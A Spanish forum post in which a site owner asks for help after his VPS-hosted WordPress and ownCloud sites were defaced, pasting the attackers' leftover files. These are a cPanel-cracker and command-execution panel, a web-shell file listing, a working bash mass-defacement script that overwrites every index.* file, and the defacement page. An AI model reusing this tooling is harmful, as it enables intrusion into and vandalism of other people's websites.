Resultados 1 al 4 de 4

Me hackearon la web

  1. #1 Me hackearon la web 
    Avanzado
    Fecha de ingreso
    Sep 2004
    Ubicación
    Me in the middle
    Mensajes
    375
    Descargas
    3
    Uploads
    0
    Buenas, no sabia donde buscar información, ni donde entrar y me acordé de este magnifico foro que me ayudo tanto y aprendí tanto en él

    Al lío, tengo contratado un servidor privado virtual en OVH, tengo instalado el debian 7, dentro tengo apache, mysql y vsftpd corriendo. En apache tengo 2 sitios, uno en wordpress 3.9.2 y el owncloud 7.0. El sistema lo actualizo una ver por semana o cada 2 semanas y el wordpress cada vez que leo que hay una actualización.

    Ayer por la noche me llama mi padre y me avisa que unos marroquies nos hackearon la pagina que lo arregle rapido, menos mal que una vez por semana hago copia de todo al raspberry que tengo en casa, fue cuestion de 30 min volver todo a la copia del sabado pero antes me descargue las cosas que ellos habian modificado.

    Ahi dejo una captura:



    Tengo la sospecha que habrán explotado alguna vulnerabilidad del wordpress pero que con eso consiguieron una shell del servidor, ya que modificaron ademas de la pagina de mi padre, la pagina del owncloud, todas las paginas que se llamaban index.* estan con ese mensaje.

    Los logs están todos borrados, como podrán ver que uno de los ficheros es para tal fin, copio el código de lo que descargue del servidor a ver si se puede por lo menos saber por donde entraron, ya que veo complicado poder rastrear a esta gente

    Código:
    <html>
    <title>1337w0rm | cPanel Cracker</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <head>
    
    <style>
    	    
    	    /* RetnOHacK 2013 */
    
    
                body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black; background-image: url(http://www.wallsave.com/wallpapers/1920x1080/alien-nature/601147/alien-nature-matrix-601147.jpg);
    				background-repeat: no-repeat;
    				background-position: bottom; }
                td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
                td:hover{background-color: black; color: #33FF00;}
                input{background-color: black; color: #00FF00; border: 1px solid red;}
                input:hover{background-color: #006600;}
                textarea{background-color: black; color: #00FF00; border: 1px solid red;}
                a {text-decoration: none; color: #66FF00; font-weight: bold;}
                a:hover {color: #00FF00;}
                select{background-color: black; color: #00FF00;}
                #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
                #main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
                #main a:hover{color: #00FF00; text-decoration: underline;}
                #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
    </style>
    
    </head>
    
    
    
    
    <form method="POST" target="_blank">
    	<strong>
    <input name="page" type="hidden" value="find">        				
        </strong>
        <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
        <tr>
            <td valign="top" bgcolor="#151515"><center><strong><img src="http://i.imgur.com/gqqQgzw.png" /><br>
    		</strong>
    		</center></td>
        </tr>
        <tr>
        <td>
        <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
        <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    	<strong>User :</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="80" rows="5" name="usernames"></textarea></strong></td>
        </tr>
        <tr>
        <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    	<strong>Pass :</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="80" rows="5" name="passwords"></textarea></strong></td>
        </tr>
        <tr>
        <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    	<strong>Type :</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
        <span class="style2"><strong>Simple : </strong> </span>
    	<strong>
    	<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
        <font class="style2"><strong>/etc/passwd : </strong> </font>
    	<strong>
    	<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
    	</strong>
    	</span>
        </td>
        </tr>
        <tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
        </strong>
        </td>
        <tr>
    </form>    
        
        <td valign="top" colspan="6"><strong></strong></td>
    
    <form method="POST" target="_blank">
    <strong>
    <input type="hidden" name="go" value="cmd_mysql">
        	</strong>
        	<tr>
        <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
        				</tr>
        	<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
        <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
        <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
        <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
        <td valign="top" bgcolor="#151515"><strong>database</strong></td>
        <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
        				</tr>
    					<tr>
        <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
    	<strong>cmd ~</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
    	<strong>
    	<textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
    SHOW TABLES user_vb ;
    SELECT * FROM user;
    SELECT version();
    SELECT user();</textarea></strong></td>
        	</tr>
    		<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
        	</tr>
    <input name="db" value="MySQL" type="hidden">
    <input name="db_server" type="hidden" value="localhost">
    <input name="db_port" type="hidden" value="3306">
    <input name="cccc" type="hidden" value="db_query">
        	
    </form>    	
    		<tr>
        <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
    
    
    		</tr>
    		
    <form method="POST" target="_blank">
    		<tr>
        <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD 
    	system - passthru - exec - shell_exec</strong></td>
        				</tr>
    		<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>CMD ~</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
    					<select name="att" dir="rtl"  size="1">
    						<option value="system" selected="">system</option>
    						<option value="passthru">passthru</option>
    						<option value="exec">exec</option>
    						<option value="shell_exec">shell_exec</option>
    					</select>    
        <strong>
    <input name="page" type="hidden" value="ccmmdd">    
    	<input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
        	</tr>
    		<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
        	</tr>
    </form>    	    	
    
    <form method="POST" target="_blank">
    
    		<tr>
        <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show 
    	File And Edit</strong></td>
        				</tr>
    		<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
    	<strong>
    	<input name="pathclass" type="text" style="width: 284px" value="/home/document/public_html/wp-content/uploads"></strong></td>
        	</tr>
    		<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
        <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
        				</tr>
    <input name="page" type="hidden" value="show">        				
    </form>    				
    					<tr>
        <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info 
    	Security</strong></td>
        				</tr>
        	<tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
    	<strong>
    OFF	
    	</strong>	
    	</td>
        				</tr>
        <tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Uname</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
    	<strong>
    <font face="Verdana" size="2">
    
    Linux server.leecreative.co.uk 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64
    
    </strong></td></tr><tr>
        <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Tools</strong></td>
        <td valign="top" bgcolor="#151515" colspan="5">
    	<strong>
    <center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center><hr color=lime>
    #Procoderz Team Albania - 1337w0rm &copy; RetnOHacK 2013
    </strong></td>
    </textarea>
    <center>
    <form method=post><input type=submit name=ini value="PHP.INI" />
    <form method=post><input type=submit name="usre" value="CRACKER" /></form></form>
    		<font color=red size=2 face="TAHOMA">
    Código:
    #!/bin/bash
    echo 
    echo '***********************************'
    echo ' Aljyyosh Mass Defacer' 
    echo 'Coded By : r00t-minat0r'
    echo '***********************************' 
    echo "Please Don't Use This Against muslims Sites"
    echo
    echo 'please enter your index path on the server'
    echo 'e.g : "/home/r00t-minat0r/index.html"'
    read index 
    echo
    echo 'please enter public_html folder path [www] for your user '
    echo 'enter the path Depending on your privileges on the server '
    echo 'e.g : "/home/r00t-minat0r/public_html"'
    read path
    echo
    find $path -name "index.*" -exec cp $index {} \;
    echo 
    echo 'Site Stats : DEFACED'
    echo '[*] Done !'
    echo
    Código:
    <html>
    <title>www.documenthouse.co.uk ~ Shell I</title>
    <head>
    <style>
    td {
     font-size: 12px;
     font-family: verdana;
     color: #33FF00;
     background: #000000;
    }
    #d {
     background: #003000;
    }
    #f {
     background: #003300;
    }
    #s {
     background: #006300;
    }
    #d:hover
    {
     background: #003300;
    }
    #f:hover
    {
     background: #003000;
    }
    pre {
     font-size: 10px;
     font-family: verdana;
     color: #33FF00;
    }
    a:hover {
    text-decoration: none;
    }
    
    input,textarea,select {
     border-top-width: 1px;
     font-weight: bold;
     border-left-width: 1px;
     font-size: 10px;
     border-left-color: #33FF00;
     background: #000000;
     border-bottom-width: 1px;
     border-bottom-color: #33FF00;
     color: #33FF00;
     border-top-color: #33FF00;
     font-family: verdana;
     border-right-width: 1px;
     border-right-color: #33FF00;
    }
    hr {
    color: #33FF00;
    background-color: #33FF00;
    height: 5px;
    }
    </style>
    </head>
    <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
    <table width=100%><td id="header" width=100%>
    <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="green.php">Home</a>]  [<a href="?p=cmd&dir=/home/document/public_html">Execute Command</a>]  [<a href="?p=eval&dir=/home/document/public_html">Evaluate PHP</a>]  [<a href="?p=mysql&dir=/home/document/public_html">MySQL Query</a>]  [<a href="?p=chmod&dir=/home/document/public_html">Chmod File</a>]  [<a href="?p=phpinfo&dir=/home/document/public_html">PHPinfo</a>]  [<a href="?p=md5&dir=/home/document/public_html">md5 cracker</a>]  [<a href="?p=headers&dir=/home/document/public_html">Show headers</a>]  [<a href="?p=logout&dir=/home/document/public_html">Log out</a>] <br><hr><h2><a href="green.php?dir="></a>/<a href="green.php?dir=/home">home</a>/<a href="green.php?dir=/home/document">document</a>/<a href="green.php?dir=/home/document/public_html">public_html</a>/</h2><br></td><tr><td><table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr><td id=d><a href="?p=rename&file=/home/document/public_html&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html">[D]</a></td><td id=d><a href="green.php?dir=/home/document/public_html">.</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html"><font color=green>0750</font></a></td><td id=d>2014/08/14, 22:21:27</td><tr><td id=d><a href="?p=rename&file=/home/document&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document">[D]</a></td><td id=d><a href="green.php?dir=/home/document">..</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document"><font color=green>0711</font></a></td><td id=d>2014/08/12, 23:50:29</td><tr><td id=d><a href="?p=rename&file=/home/document/public_html/cgi-bin&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/cgi-bin">[D]</a></td><td id=d><a href="green.php?dir=/home/document/public_html/cgi-bin">cgi-bin</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/cgi-bin"><font color=green>0755</font></a></td><td id=d>2014/01/13, 13:20:19</td><tr><td id=d><a href="?p=rename&file=/home/document/public_html/wp-admin&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-admin">[D]</a></td><td id=d><a href="green.php?dir=/home/document/public_html/wp-admin">wp-admin</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-admin"><font color=green>0755</font></a></td><td id=d>2014/08/12, 23:48:58</td><tr><td id=d><a href="?p=rename&file=/home/document/public_html/wp-content&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-content">[D]</a></td><td id=d><a href="green.php?dir=/home/document/public_html/wp-content">wp-content</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-content"><font color=green>0755</font></a></td><td id=d>2014/08/12, 23:41:04</td><tr><td id=d><a href="?p=rename&file=/home/document/public_html/wp-includes&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-includes">[D]</a></td><td id=d><a href="green.php?dir=/home/document/public_html/wp-includes">wp-includes</a></td><td id=d></td><td id=d><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-includes"><font color=green>0755</font></a></td><td id=d>2014/08/12, 23:31:43</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/.htaccess&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/.htaccess">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/.htaccess">.htaccess</a></td><td id=f>237</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/
    public_html/.htaccess"><font color=green>0644</font></a></td><td id=f>2014/05/21, 17:42:40</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">Settings.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">conf_global.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">config.inc.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">config.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">configuration.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">connect.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/error_log&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/error_log">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/error_log">error_log</a></td><td id=f>3921</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/error_log"><font color=green>0644</font></a></td><td id=f>2014/08/08, 20:58:06</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/green.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/green.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/green.php">green.php</a></td><td id=f>19856</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/green.php"><font color=green>0644</font></a></td><td id=f>2014/08/14, 22:21:27</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/index.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/index.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/index.php">index.php</a></td><td id=f>418</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/index.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:35</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/license.txt&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/license.txt">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/license.txt">license.txt</a></td><td 
    id=f>19544</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/license.txt"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:35</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">mk_conf.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/readme.html&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/readme.html">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/readme.html">readme.html</a></td><td id=f>7130</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/readme.html"><font color=green>0644</font></a></td><td id=f>2014/08/06, 21:09:49</td><tr><td id=f><a href="?p=rename&file=&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=">submitticket.php</a></td><td id=f></td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file="><font color=red>????</font></a></td><td id=f>1970/01/01, 01:00:00</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/test.html&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/test.html">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/test.html">test.html</a></td><td id=f>2493</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/test.html"><font color=green>0644</font></a></td><td id=f>2014/04/30, 11:48:08</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-activate.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-activate.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-activate.php">wp-activate.php</a></td><td id=f>4892</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-activate.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:34</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-blog-header.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-blog-header.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-blog-header.php">wp-blog-header.php</a></td><td id=f>271</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-blog-header.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:33</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-comments-post.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-comments-post.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-comments-post.php">wp-comments-post.php</a></td><td id=f>4795</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-comments-post.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:33</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-config-sample.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-config-sample.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-config-sample.php">wp-config-sample.php</a></td><td id=f>3087</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-config-sample.php"><font color=green>0644</font></a></
    td><td id=f>2013/12/03, 15:01:32</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-config.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-config.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-config.php">wp-config.php</a></td><td id=f>3378</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-config.php"><font color=green>0644</font></a></td><td id=f>2014/01/13, 15:23:43</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-cron.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-cron.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-cron.php">wp-cron.php</a></td><td id=f>2932</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-cron.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:32</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-links-opml.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-links-opml.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-links-opml.php">wp-links-opml.php</a></td><td id=f>2380</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-links-opml.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:31</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-load.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-load.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-load.php">wp-load.php</a></td><td id=f>2359</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-load.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:29</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-login.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-login.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-login.php">wp-login.php</a></td><td id=f>32475</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-login.php"><font color=green>0644</font></a></td><td id=f>2014/08/06, 21:09:49</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-mail.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-mail.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-mail.php">wp-mail.php</a></td><td id=f>7772</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-mail.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:28</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-settings.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-settings.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-settings.php">wp-settings.php</a></td><td id=f>10585</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-settings.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:27</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-signup.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-signup.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-signup.php">wp-signup.php</a></td><td id=f>25673</td><td id=f><a href="?p=chmod&dir=/home/
    document/public_html&file=/home/document/public_html/wp-signup.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:27</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/wp-trackback.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/wp-trackback.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/wp-trackback.php">wp-trackback.php</a></td><td id=f>4026</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/wp-trackback.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:28</td><tr><td id=f><a href="?p=rename&file=/home/document/public_html/xmlrpc.php&dir=/home/document/public_html">[R]</a><a href="?p=delete&file=/home/document/public_html/xmlrpc.php">[D]</a></td><td id=f><a href="green.php?p=edit&dir=/home/document/public_html&file=/home/document/public_html/xmlrpc.php">xmlrpc.php</a></td><td id=f>3015</td><td id=f><a href="?p=chmod&dir=/home/document/public_html&file=/home/document/public_html/xmlrpc.php"><font color=green>0644</font></a></td><td id=f>2013/12/03, 15:01:25</td><tr></table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype="multipart/form-data" action="green.php?dir=/home/document/public_html" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="100000000" /><input size=30 name="uploadedfile" type="file" />
    <input type="submit" value="Upload File" />
    </form></td><td><form action="green.php" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value="/home/document/public_html"><input type=submit value="Change Directory"></form></td>
    <tr><td><form action="green.php" method=GET><b>Create file<br></b><input type=hidden name=dir value="/home/document/public_html"><input type=text size=40 name=file value="/home/document/public_html"><input type=hidden name=p value=edit><input type=submit value="Create file"></form>
    </td><td><form action="green.php" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value="/home/document/public_html"><input type=hidden name=dir value="/home/document/public_html"><input type=hidden name=p value=createdir><input type=submit value="Create directory"></form></td>
    </table><tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>
    Código:
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>HaCkeD By Moroccan Agent Secret</title>
    
    <head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"
        type="text/javascript">
        </script>
        <script type="text/javascript">$(document).ready(function() {$(".facebookbox").hover(function() {$(this).stop().animate({right: "0"}, "medium");}, function() {$(this).stop().animate({right: "-250"}, "medium");}, 500);});
        </script><style type="text/css">
        .facebookbox{background: url("http://www9.0zz0.com/2012/12/05/17/644420689.png")
         no-repeat scroll left center transparent !important;display: block;float: right;height: 270px;padding: 0 5px 0 46px;width: 245px;z-index: 99999;position:fixed;right:-250px;top:40%;}
        .facebookbox div{border:none;position:relative;display:block;}
        .facebookbox span{bottom: 12px;font: 8px "lucida grande",tahoma,verdana,arial,sans-serif;position: absolute;right: 6px;text-align: right;z-index: 99999;}
        .facebookbox span a{color: #808080;text-decoration:none;}
        .facebookbox span a:hover{text-decoration:underline;}</style>
    </head>
    <style type="text/css">
    
    body {
    	background-color: #060606;
    }
    .anass{
    	haight: 20px;
    	}
    .Style1 {
    	color: #FFFFFF;
    	font-family: "Courier New", Courier, monospace;
    }
    .Style3 {color: #99FF66}
    .Style4 {
    	color: #FF0000;
    	font-weight: bold;
    }
    .Style5 {
    	color: #66CCCC;
    	font-weight: bold;
    }
    .Style5:hover{
    	background: #000;
    	color: #D7241A;
    	}
    .Style6 {color: #66FFFF}
    .Style7 {
    	color: #00CCFF;
    	font-weight: bold;
    }
    .Style8 {
    	color: #FFFFFF;
    	
    	}
    .Style8 a{
    	text-decoration: none;
    	color: #FFFFFF;
    	}
    .Style8 a:hover{
    		background: #DF002F;
    		color: #000;
    		border: 1px dotted #C18206 ;
    	}
    .Style9 {color: #33FFFF}
    
    </style></head>
    
    <body>
    	<div class="facebookbox" >
    <iframe scrolling="no" frameborder="0" style="border: medium none; overflow: hidden; height: 270px; width: 245px;background:#fff;" src="http://www.facebook.com/plugins/likebox.php?href=https://www.facebook.com/MoroccanAgentSecret&width=245&colorscheme=light&show_faces=true&connections=9&stream=false&header=false&height=270"></iframe>
    </div>  
    <div class="Style1" align="center">
      <h1 class="Style5">Moroccan Agent Secret Was Here </h1>
    
      <p ><img src="https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn1/60199_389336227802164_836712536_n.png"></p>
